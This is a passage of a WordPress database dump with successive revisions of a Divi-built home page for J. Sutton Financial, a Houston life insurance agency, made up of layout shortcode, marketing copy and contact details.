dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work for Us\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px|false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_padding_last_edited=\"on|phone\" custom_padding_phone=\"0px|0px|||false|false\" sticky_enabled=\"0\" custom_padding_tablet=\"33px|1px||||\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:15:24','2023-04-08 21:15:24','',138,'http://cmdev-site1.com/?p=860',0,'revision','',0),(861,1,'2023-04-08 21:15:33','2023-04-08 21:15:33','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work for Us\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px|false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_padding_last_edited=\"on|phone\" custom_padding_phone=\"0px|0px|||false|false\" sticky_enabled=\"0\" align=\"center\" custom_padding_tablet=\"33px|1px||||\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:15:33','2023-04-08 21:15:33','',138,'http://cmdev-site1.com/?p=861',0,'revision','',0),(862,1,'2023-04-08 21:16:58','2023-04-08 21:16:58','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work for Us\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" 